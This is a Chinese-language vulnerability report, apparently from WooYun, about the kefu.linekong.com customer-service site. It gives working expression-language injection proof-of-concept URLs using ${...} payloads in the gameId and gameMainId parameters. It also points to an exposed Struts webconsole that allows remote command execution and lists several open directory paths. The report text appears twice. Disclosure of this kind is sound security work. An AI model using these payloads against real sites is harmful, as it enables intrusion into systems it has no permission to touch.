站点:http://kefu.linekong.com
Expression language injection参考:
WooYun: 大众点评某站点Expression language injection
WooYun: 杭州市人力资源和社会保障网Expression language injection(可利用)
一、Expression language injection
地址1:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${99337-10246}&gameMainId=4
测试效果:

打开该地址并查看源代码: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${application}&gameMainId=4
地址2:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
测试效果:

打开该地址,并查看源代码:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=4${application}
二、远程命令执行漏洞
WooYun: 大众点评某分站存在远程命令执行漏洞2
地址:http://kefu.linekong.com/eService/struts/webconsole.html

三、任意目录访问
http://kefu.linekong.com/eService/css/
http://kefu.linekong.com/eService/download/
http://kefu.linekong.com/eService/images/
http://kefu.linekong.com/eService/js/

站点:http://kefu.linekong.com
一、Expression language injection
地址1:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${99337-10246}&gameMainId=4
测试效果:

打开该地址并查看源代码: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${application}&gameMainId=4
地址2:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
测试效果:

打开该地址,并查看源代码:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=4${application}
二、远程命令执行漏洞
地址:http://kefu.linekong.com/eService/struts/webconsole.html

三、任意目录访问
http://kefu.linekong.com/eService/css/
http://kefu.linekong.com/eService/download/
http://kefu.linekong.com/eService/images/
http://kefu.linekong.com/eService/js/
